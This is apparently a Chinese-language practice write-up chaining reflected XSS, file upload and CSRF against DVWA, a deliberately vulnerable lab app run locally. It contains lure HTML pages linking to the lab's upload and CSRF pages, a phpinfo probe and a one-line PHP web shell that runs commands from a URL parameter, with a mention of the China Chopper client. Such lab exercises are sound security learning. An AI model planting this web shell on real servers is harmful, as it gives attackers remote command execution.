在學習的過程中，想到將幾種漏洞進行組合練習，記錄下學習過程。大佬請繞過！謝謝！！

前期知識：瞭解反射型XSS、檔案上傳、CSRF漏洞原理及利用方法。

一、反射型XSS;

1、檢視原始碼檔案：WWW\DVWA\vulnerabilities\xss_r\source\low.php

未做任何過濾，構造如下HTML程式碼，分別為兩張圖片，誘惑使用者去點選，形成XSS攻擊：

<!DOCTYPE html> <html> <head> <title>a標籤測試</title> <meta charset="utf-8"> </head> <body> 你想成為一名黑客嗎？<br> <a href="http://127.0.0.1/DVWA/vulnerabilities/upload/"> <img src="https://ss1.bdstatic.com/70cFvXSh_Q1YnxGkpoWK1HF6hhy/it/u=2067493440,1557616999&fm=27&gp=0.jpg" /> </a> </body> </html>

<!DOCTYPE html> <html> <head> <title>a標籤測試</title> <meta charset="utf-8"> </head> <body> 你想成為一名黑客嗎？<br> <a href="http://127.0.0.1/DVWA/vulnerabilities/csrf/"> <img src="https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1530086683000&di=1b41000500ee5e5f73e792539819308f&imgtype=0&src=http%3A%2F%2Fe.hiphotos.baidu.com%2Fzhidao%2Fpic%2Fitem%2F738b4710b912c8fccfb476b1f4039245d6882102.jpg" /> </a> </body> </html>

2、第一張跳轉到檔案上傳漏洞：

3、第二張跳轉到CSRF漏洞：

二、檔案上傳：

1、檢視原始碼：WWW\DVWA\vulnerabilities\upload\source\low.php

2、Phpinfo一句話：<?php phpinfo();?>

3、Shell.php一句話木馬：<?php echo shell_exec($_GET['cmd']);?>

或者上傳一句話木馬，用中國菜刀進行連線。

三、CSRF：

1、檢視原始碼：WWW\DVWA\vulnerabilities\csrf\source\low.php

2、誘使使用者點選此連結則修改了使用者的密碼：

注：若有錯誤之處，請各位大佬指出！本文屬於自己原創，轉載請註明出處，謝謝！